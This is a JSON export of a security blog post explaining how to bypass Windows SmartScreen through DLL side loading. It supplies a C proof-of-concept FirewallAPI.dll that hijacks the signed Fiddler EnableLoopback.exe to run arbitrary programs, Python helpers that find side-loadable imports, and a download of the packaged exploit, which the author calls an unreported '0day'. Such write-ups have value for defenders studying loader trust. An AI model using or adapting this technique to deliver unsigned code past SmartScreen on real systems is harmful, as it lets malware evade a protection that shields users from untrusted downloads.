{"id":1664,"date":"2020-12-19T00:08:46","date_gmt":"2020-12-19T07:08:46","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=1664"},"modified":"2020-12-19T00:08:46","modified_gmt":"2020-12-19T07:08:46","slug":"bypassing-windows-smartscreen","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2020\/12\/bypassing-windows-smartscreen\/","title":{"rendered":"Bypassing Windows SmartScreen"},"content":{"rendered":"\n<p>God, it&#8217;s been forever since I made an update. I figured if I was to make an update after more than a year&#8217;s absence, it better damned well be a good fucking update.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"647\" height=\"647\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/wjhgvxuurfs41.png\" alt=\"\" class=\"wp-image-1679\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/wjhgvxuurfs41.png 647w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/wjhgvxuurfs41-300x300.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/wjhgvxuurfs41-150x150.png 150w\" sizes=\"(max-width: 647px) 100vw, 647px\" \/><figcaption>Feels like the last time I updated this blog<\/figcaption><\/figure>\n\n\n\n<p>OK, so Smart Screen is a Windows Defender feature that comes with Windows 10. It pops up a warning when you try to run a binary that was downloaded from the internet (the file carries the Mark of the Web, a Zone.Identifier stream that browsers and Explorer tag downloads with) and that is unsigned and \/ or has no reputation with Microsoft. 
Kind of annoying when you&#8217;re writing malware or exploits and Windows Defender flags your payloads, but that&#8217;s a topic for another post.<\/p>\n\n\n\n<h2>Smart Screen Process<\/h2>\n\n\n\n<p>Microsoft Smart Screen works on executables by checking:<\/p>\n\n\n\n<ul><li>Does this file even carry the Mark of the Web? No mark, no check.<\/li><li>Does Microsoft&#8217;s reputation service already know this file&#8217;s hash? Known bad is blocked, known good runs.<\/li><li>Are we signed?<\/li><li>Is the signing certificate in our &#8216;good boy&#8217; list?<\/li><\/ul>\n\n\n\n<p>The &#8216;good boy&#8217; list I am referring to is really publisher reputation: certificates that have signed enough clean, widely run software that Microsoft trusts them no questions asked. Ever wondered why Smart Screen doesn&#8217;t say shit when you open a Microsoft tool downloaded from the internet? This is because those certs are in the &#8216;good boy&#8217; list.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"852\" height=\"691\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-2.png\" alt=\"\" class=\"wp-image-1667\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-2.png 852w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-2-300x243.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-2-768x623.png 768w\" sizes=\"(max-width: 852px) 100vw, 852px\" \/><figcaption>What makes them so special?<\/figcaption><\/figure>\n\n\n\n<p>Anyways, here we have an unsigned, untrusted exe written by me that does nothing. 
<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"594\" height=\"442\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-1.png\" alt=\"\" class=\"wp-image-1666\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-1.png 594w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-1-300x223.png 300w\" sizes=\"(max-width: 594px) 100vw, 594px\" \/><figcaption>Do nothing useful<\/figcaption><\/figure>\n\n\n\n<p>Here we have it popping Smart Screen, upset that my binary doesn&#8217;t pass its &#8216;background check&#8217;.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"787\" height=\"718\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image.png\" alt=\"\" class=\"wp-image-1665\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image.png 787w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-300x274.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-768x701.png 768w\" sizes=\"(max-width: 787px) 100vw, 787px\" \/><figcaption>Smart Screen doing its job<\/figcaption><\/figure>\n\n\n\n<p>OK, so how the hell do you bypass this? Well you <strong>could<\/strong> sign your exe, but that costs money. Even then, a freshly bought certificate has no reputation yet, so smart screen will still alert until enough clean software signed with it has been seen in the wild (EV code signing certs are the exception and get reputation right away). <\/p>\n\n\n\n<h2>Inherited Trust Issues<\/h2>\n\n\n\n<p>The answer is obvious. We exploit a program in the &#8216;good boy&#8217; list to run our code. &#8220;But Joe&#8221;, you may ask, &#8220;how the fuck are we supposed to run our code when these trusted exes have a signature check that breaks once you modify them?&#8221;. That&#8217;s a damned good question. The answer lies in where Windows actually does the checking: Smart Screen is a shell feature, not a loader feature. 
Signed executables have an inherited trust issue. Smart Screen gets consulted when Explorer (or anything calling ShellExecute) opens a file that carries the Mark of the Web, and that is the only place it gets consulted. Programs that aren&#8217;t signed but are run by programs that are signed never go through that path, so they are given the same trust. Allow me to illustrate.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"733\" height=\"275\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-3.png\" alt=\"\" class=\"wp-image-1668\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-3.png 733w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-3-300x113.png 300w\" sizes=\"(max-width: 733px) 100vw, 733px\" \/><figcaption>This is why we can&#8217;t have nice things<\/figcaption><\/figure>\n\n\n\n<p>So programs spawned from trusted programs are trusted. Does it only apply to process creation? NO! Dynamic link libraries work in the same manner! LoadLibrary never asks Smart Screen anything. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-4.png\" alt=\"\" class=\"wp-image-1669\" width=\"580\" height=\"252\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-4.png 632w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-4-300x131.png 300w\" sizes=\"(max-width: 580px) 100vw, 580px\" \/><\/figure>\n\n\n\n<p>So to bypass Smart Screen, we need to exploit the trust issue of either a bad CreateProcess, ShellExec, WinExec, etc call where we can specify our own executable name \/ path (CreateProcess and WinExec never talk to Smart Screen at all; ShellExecute only does if the target file still carries the Mark of the Web). This is hard to do, but not impossible, however I rarely encounter untrusted execution. Anything easier? What about DLLs? Those work fantastically and the vulnerabilities for exploiting them are <strong>everywhere<\/strong>. 
What we are taking advantage of is something called &#8216;DLL Side Loading&#8217;.<\/p>\n\n\n\n<h2>DLL Side Loading<\/h2>\n\n\n\n<p>DLL side loading is what happens when an exe asks for a DLL by bare name, the loader finds a copy in the exe&#8217;s own folder before it gets around to the real one in System32, and the exe then calls exports from whatever it got. By dropping our own DLL next to the exe, we can exploit this. It&#8217;s not always cut and dry, and there are a number of mitigations that have been put in place to prevent this. <\/p>\n\n\n\n<p>DLL files are searched for in a particular order (this is the default, SafeDllSearchMode on). <\/p>\n\n\n\n<ol><li>Am I already loaded in this process, or a known DLL? If so, use that copy (known DLLs always come from System32) and stop looking.<\/li><li>Does the exe manifest (or an API set \/ redirection) say where to get me? If so, load from there.<\/li><li>Am I in the folder the exe lives in? That is the application directory, not the current working directory.<\/li><li>Am I in the system folders (System32, then the 16-bit System folder, then Windows)?<\/li><li>Am I in the current working directory?<\/li><li>Am I in a folder on the environment variable &#8216;PATH&#8217;?<\/li><li>No to all? FAIL. <\/li><\/ol>\n\n\n\n<p>So what do I mean when I say known DLL? There exists a registry entry on Windows that contains a list of DLLs that are considered &#8216;known&#8217; and are always loaded from System32, no search at all. It&#8217;s located under HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"753\" height=\"739\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-5.png\" alt=\"\" class=\"wp-image-1670\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-5.png 753w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-5-300x294.png 300w\" sizes=\"(max-width: 753px) 100vw, 753px\" \/><\/figure>\n\n\n\n<p>This may seem like an end all to our side loading exploitation, but not really. Even an amateur Windows programmer will notice that this list is missing a number of DLL files used all the damned time. Things like vcruntime140.dll, winmm.dll, comctl32.dll, and wintrust.dll are missing. 
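<\/p>\n\n\n\n<p>To make the order above concrete, here is a small model of the search the loader runs (added here as an example; it is not code from this post, and the KnownDLLs list, folder names and file layout in it are made up for the demonstration). It replays SafeDllSearchMode against a fake filesystem and shows that a planted FirewallAPI.dll in the exe&#8217;s folder wins, a planted kernel32.dll is ignored because it is a known DLL, and a DLL planted only in the current working directory loses to the System32 copy:<\/p>\n\n\n\n

```python
"""Model of the Windows DLL search order with SafeDllSearchMode on (the default).

Added example, not code from the original post: it replays the search order
against a constructed fake filesystem so you can see which planted DLLs the
loader would actually pick up and which it never will."""

# Constructed sample of HKLM\...\Session Manager\KnownDLLs. On a real box read the
# registry key; this handful is enough for the demonstration.
KNOWN_DLLS = {"kernel32.dll", "ntdll.dll", "user32.dll", "gdi32.dll",
              "advapi32.dll", "ole32.dll", "shell32.dll", "rpcrt4.dll"}

SYSTEM32 = r"C:\Windows\System32"
SYSTEM16 = r"C:\Windows\System"   # legacy 16-bit system directory, still searched
WINDIR = r"C:\Windows"


def resolve_dll(name, app_dir, cwd, path_dirs, files, known_dlls=KNOWN_DLLS):
    """Return the path the loader would map for `name`, or None if the load fails.

    `files` is the fake filesystem: a set of full paths that exist. Lookups are
    case-insensitive like NTFS. Manifest / API-set redirection is not modelled.
    """
    present = {p.lower() for p in files}

    def find_in(directory):
        candidate = directory.rstrip("\\") + "\\" + name
        return candidate if candidate.lower() in present else None

    # 1. KnownDLLs are served straight from the System32 section objects; the
    #    application directory is never consulted for them.
    if name.lower() in known_dlls:
        return find_in(SYSTEM32)

    # 2. Otherwise walk the directories in SafeDllSearchMode order. The exe's own
    #    folder comes first; the current working directory only after the system
    #    folders, which is why "drop it in cwd" usually loses to System32.
    search_order = [app_dir, SYSTEM32, SYSTEM16, WINDIR, cwd, *path_dirs]
    for directory in search_order:
        hit = find_in(directory)
        if hit:
            return hit
    return None


def sideload_wins(name, app_dir, cwd, path_dirs, files, known_dlls=KNOWN_DLLS):
    """True when the DLL the loader picks is the attacker's copy in app_dir."""
    chosen = resolve_dll(name, app_dir, cwd, path_dirs, files, known_dlls)
    return chosen is not None and chosen.lower().startswith(app_dir.lower() + "\\")


# Constructed scenario: Fiddler's EnableLoopback.exe unpacked into Downloads, with
# DLLs planted beside it and one more in the (different) working directory.
APP_DIR = r"C:\Users\joe\Downloads\Fiddler"
CWD = r"C:\Users\joe"
PATH_DIRS = [r"C:\Tools"]
FAKE_FS = {
    APP_DIR + r"\EnableLoopback.exe",
    APP_DIR + r"\FirewallAPI.dll",      # planted: not a KnownDLL, real one lives in System32
    APP_DIR + r"\kernel32.dll",         # planted: KnownDLL, will be ignored
    APP_DIR + r"\iamcool.exe",
    CWD + r"\version.dll",              # planted in cwd only: loses to System32
    SYSTEM32 + r"\FirewallAPI.dll",
    SYSTEM32 + r"\kernel32.dll",
    SYSTEM32 + r"\version.dll",
    r"C:\Tools\helper.dll",             # only reachable through PATH, last resort
}

if __name__ == "__main__":
    for dll in ("FirewallAPI.dll", "kernel32.dll", "version.dll", "helper.dll", "nothere.dll"):
        print(f"{dll:16} -> {resolve_dll(dll, APP_DIR, CWD, PATH_DIRS, FAKE_FS)}")
```

<p>Run it and you get one resolved path per DLL. The interesting line is version.dll: it exists in cwd and in System32, and System32 wins, which is why the folder that matters for side loading is the one the exe sits in. Nothing in the model helps you with kernel32.dll or any other entry in the KnownDLLs key, and the same holds the other way round for winmm.dll, comctl32.dll and the rest of the DLLs missing from that key.<\/p>\n\n\n\n<p>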
This means any exe that is importing entries from these DLL files (and others) is vulnerable to side loading, provided you can write to the folder the exe lives in or, as here, you ship the exe and your DLL together. <\/p>\n\n\n\n<p>The other entry I brought up was the dependency check under the exe manifest. This check however is poorly documented and I rarely ever see it used anywhere (including on Windows binaries). It&#8217;s not much of a mitigation.<\/p>\n\n\n\n<p>So does DLL side loading work on .NET binaries as well? Hell yes. A .NET exe pulls native DLLs in through P\/Invoke (DllImport), which is just LoadLibrary underneath with the same search order. Ok, so enough about that, and save that for another blog post. Now let&#8217;s utilize DLL side loading to bypass smart screen. <\/p>\n\n\n\n<h2>Get On With It<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-6-1024x575.png\" alt=\"\" class=\"wp-image-1671\" width=\"580\" height=\"325\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-6-1024x575.png 1024w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-6-300x169.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-6-768x432.png 768w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-6.png 1194w\" sizes=\"(max-width: 580px) 100vw, 580px\" \/><\/figure>\n\n\n\n<p>So now what we need is an exe that&#8217;s in the good boy list that&#8217;s vulnerable to DLL side loading. Bonus points if it requires elevation: the UAC prompt then shows the trusted publisher, and once the user clicks through, our DLL runs with admin privileges too. For this I am choosing a program that comes with <a rel=\"noreferrer noopener\" href=\"https:\/\/www.telerik.com\/fiddler\" target=\"_blank\">Fiddler<\/a> named EnableLoopback.exe and it&#8217;s a .NET exe too! This is a bit of a &#8216;0day&#8217;, but Telerik doesn&#8217;t have a bug bounty and they didn&#8217;t seem interested when I reached out, so screw em. The exe imports &#8216;FirewallAPI.dll&#8217;, which is not in the &#8216;Known DLLs&#8217; registry key, so the loader looks in the exe&#8217;s own folder before it looks in System32. 
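<\/p>\n\n\n\n<p>How do you find that import in the first place? For a native exe you read the PE import table; the scanner below does that with nothing but the standard library and flags every import that is not a KnownDLL (added example, not code from this post or from Fiddler; the KnownDLLs set and the sample PE it builds for itself are constructed for the demonstration). Keep in mind that EnableLoopback.exe is managed code: its P\/Invoke targets sit in the CLR metadata, not in the PE import table, which for a .NET exe only names mscoree.dll, so for .NET targets you read the DllImport declarations instead.<\/p>\n\n\n\n

```python
"""Pick side-loading candidates out of a PE import table.

Added example, not code from the original post or from Fiddler. Stdlib only: a
minimal PE parser that walks the import directory and reports every DLL the exe
pulls in by name that is not a KnownDLL, i.e. every DLL the loader will look for
in the exe's own folder first. Native imports only; P/Invoke targets of a .NET
exe live in the CLR metadata and do not appear here."""
import struct

# Constructed sample of the KnownDLLs list; read the registry key on a real box.
KNOWN_DLLS = {"kernel32.dll", "ntdll.dll", "user32.dll", "gdi32.dll",
              "advapi32.dll", "ole32.dll", "shell32.dll", "rpcrt4.dll"}


def _rva_to_offset(rva, sections):
    """Map a relative virtual address to a file offset via the section table."""
    for va, vsize, raw_size, raw_ptr in sections:
        if va <= rva < va + max(vsize, raw_size):
            return raw_ptr + (rva - va)
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def _cstring(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii")


def imported_dlls(data):
    """Return the DLL names in the PE import directory, in table order."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    pe = struct.unpack_from("<I", data, 0x3C)[0]                 # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    file_hdr = pe + 4
    nsections = struct.unpack_from("<H", data, file_hdr + 2)[0]
    opt_size = struct.unpack_from("<H", data, file_hdr + 16)[0]
    opt = file_hdr + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    data_dirs = opt + (0x60 if magic == 0x10B else 0x70)        # PE32 vs PE32+
    imp_rva = struct.unpack_from("<I", data, data_dirs + 8)[0]  # directory[1] = imports
    if imp_rva == 0:
        return []
    sections, sh = [], opt + opt_size
    for _ in range(nsections):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, sh + 8)
        sections.append((va, vsize, raw_size, raw_ptr))
        sh += 40
    names, desc = [], _rva_to_offset(imp_rva, sections)
    while True:  # IMAGE_IMPORT_DESCRIPTOR array, terminated by an all-zero entry
        name_rva = struct.unpack_from("<I", data, desc + 12)[0]
        if name_rva == 0:
            break
        names.append(_cstring(data, _rva_to_offset(name_rva, sections)))
        desc += 20
    return names


def sideload_candidates(data, known_dlls=KNOWN_DLLS):
    """Imports that go through the normal search order and can be planted beside the exe."""
    return [n for n in imported_dlls(data) if n.lower() not in known_dlls]


def build_minimal_pe(dll_names):
    """Constructed sample input: a PE32+ image whose only section is an import
    directory naming `dll_names`. Not loadable, just enough for the parser."""
    sec_rva, sec_raw = 0x1000, 0x200
    descs = bytearray(20 * (len(dll_names) + 1))        # +1 for the terminator
    names = bytearray()
    for i, dll in enumerate(dll_names):
        struct.pack_into("<I", descs, 20 * i + 12, sec_rva + len(descs) + len(names))
        names += dll.encode("ascii") + b"\0"
    body = bytes(descs + names)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                  # PE32+ magic
    struct.pack_into("<I", opt, 0x6C, 16)                  # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 0x70 + 8, sec_rva, len(descs))  # import directory
    file_hdr = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, len(opt), 0x22)
    sec_hdr = b".idata\0\0" + struct.pack("<IIII", len(body), sec_rva, len(body), sec_raw) + bytes(16)
    headers = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + sec_hdr
    return headers.ljust(sec_raw, b"\0") + body


if __name__ == "__main__":
    sample = build_minimal_pe(["KERNEL32.dll", "FirewallAPI.dll", "VERSION.dll"])
    print("imports:", imported_dlls(sample))
    print("side-loadable:", sideload_candidates(sample))
```

<p>Point imported_dlls at the bytes of a real native exe and you get its import table in order; sideload_candidates strips the known DLLs out of it. Everything left is a DLL the loader will look for next to the exe before it looks anywhere else.<\/p>\n\n\n\n<p>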
<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"372\" height=\"434\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-7.png\" alt=\"\" class=\"wp-image-1672\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-7.png 372w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-7-257x300.png 257w\" sizes=\"(max-width: 372px) 100vw, 372px\" \/><\/figure>\n\n\n\n<p>Specifically from FirewallAPI.dll, the program EnableLoopback.exe is looking at the imported entries &#8216;NetworkIsolationEnumAppContainers&#8217;, &#8216;NetworkIsolationFreeAppContainers&#8217;, &#8216;NetworkIsolationGetAppContainerConfig&#8217;, and &#8216;NetworkIsolationSetAppContainerConfig&#8217;.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"940\" height=\"328\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-8.png\" alt=\"\" class=\"wp-image-1673\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-8.png 940w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-8-300x105.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/image-8-768x268.png 768w\" sizes=\"(max-width: 940px) 100vw, 940px\" \/><\/figure>\n\n\n\n<p>So we create a DLL file named FirewallAPI.dll, name its exports accordingly, and place our malicious code in the C functions. All four exports get a stub: if the exe P\/Invokes one that isn&#8217;t there, .NET throws an EntryPointNotFoundException, and while DllMain has already fired by then, the later payloads never would. 
<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/ Proof-of-concept FirewallAPI.dll stand-in. Dropped next to EnableLoopback.exe,\n\/\/ it gets loaded before the real one in System32. Build it as x64 to match the\n\/\/ AnyCPU .NET exe; an x86 build would need __stdcall plus a .def file so the\n\/\/ export names stay undecorated.\n#include &lt;windows.h&gt;\n\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)\n{\n    switch (ul_reason_for_call)\n    {\n    case DLL_PROCESS_ATTACH:\n        \/\/ Runs the moment the exe maps us, before any export is even called.\n        \/\/ Doing real work under the loader lock is frowned upon, but a\n        \/\/ MessageBox and a WinExec survive it fine for a PoC.\n        MessageBoxW(NULL, L\"hey how's it going?\", L\"YO\", MB_OK);\n        WinExec(\"mspaint.exe\", SW_SHOWNORMAL); \/\/ can be whatever\n        break;\n    case DLL_THREAD_ATTACH:\n    case DLL_THREAD_DETACH:\n    case DLL_PROCESS_DETACH:\n        break;\n    }\n    return TRUE;\n}\n\n\/\/ Exports named exactly like the four the exe P\/Invokes. The parameter lists only\n\/\/ need to be close enough for the call to land; the bodies ignore them.\n\/\/ A non-zero return reads as a Win32 error code to the caller, which is fine:\n\/\/ our payload has already run by then.\nextern __declspec(dllexport) DWORD NetworkIsolationEnumAppContainers(DWORD Flags,\n    DWORD *pdwNumPublicAppCs, void **ppPublicAppCs)\n{\n    WinExec(\"iamcool.exe\", SW_SHOWNORMAL); \/\/ bare name, so CreateProcess looks in the exe's own folder first\n    return 2; \/\/ ERROR_FILE_NOT_FOUND\n}\n\nextern __declspec(dllexport) void NetworkIsolationFreeAppContainers(void *pPublicAppCs)\n{\n    WinExec(\"cmd.exe\", SW_SHOWNORMAL);\n}\n\nextern __declspec(dllexport) DWORD NetworkIsolationGetAppContainerConfig(DWORD *pdwNumPublicAppCs,\n    void **appContainerSids)\n{\n    WinExec(\"cmd.exe\", SW_SHOWNORMAL);\n    return 2;\n}\n\nextern __declspec(dllexport) DWORD NetworkIsolationSetAppContainerConfig(DWORD dwNumPublicAppCs,\n    void *appContainerSids)\n{\n    WinExec(\"cmd.exe\", SW_SHOWNORMAL);\n    return 2;\n}<\/code><\/pre>\n\n\n\n<p>In my code I am running mspaint on DLL attach and running cmd.exe as well as a program &#8216;iamcool.exe&#8217; from the location the main exe is launched from. 
The DLL code and iamcool executable will both run under the context of the trusted Fiddler executable, and since WinExec is just CreateProcess underneath, nothing ever asks Smart Screen about iamcool.exe.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"Bypassing Microsoft Windows Defender Smart Screen\" width=\"640\" height=\"360\" src=\"https:\/\/www.youtube.com\/embed\/azVHu4zeOPw?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Easy Peasy.<\/p>\n\n\n\n<p>Attached is my DLL, the Fiddler exe, the code, etc. <\/p>\n\n\n\n<div class=\"wp-block-file\"><a href=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/bypass-smartscreen-fiddler.7z\">bypass-smartscreen-fiddler<\/a><a href=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/bypass-smartscreen-fiddler.7z\" class=\"wp-block-file__button\" download>Download<\/a><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"540\" height=\"671\" src=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/1607540615674.jpg\" alt=\"\" class=\"wp-image-1680\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/1607540615674.jpg 540w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2020\/12\/1607540615674-241x300.jpg 241w\" sizes=\"(max-width: 540px) 100vw, 540px\" \/><\/figure>\n\n\n\n<p>It feels good to be back writing again.<\/p>\n\n\n\n<p>Jolly Christmas, Merry Holidays, and Happy Hacking!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>God, it&#8217;s been forever since I made an update. I figured if I was to make an update after more than a year&#8217;s absence, it better damned well be a good fucking update. OK, so Smart Screen is a Windows Defender feature that comes with Windows 10. 
It pops up a warning if you attempt [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[22,72,120],"_links":{"self":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1664"}],"collection":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/comments?post=1664"}],"version-history":[{"count":4,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1664\/revisions"}],"predecessor-version":[{"id":1681,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1664\/revisions\/1681"}],"wp:attachment":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/media?parent=1664"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/categories?post=1664"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/tags?post=1664"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}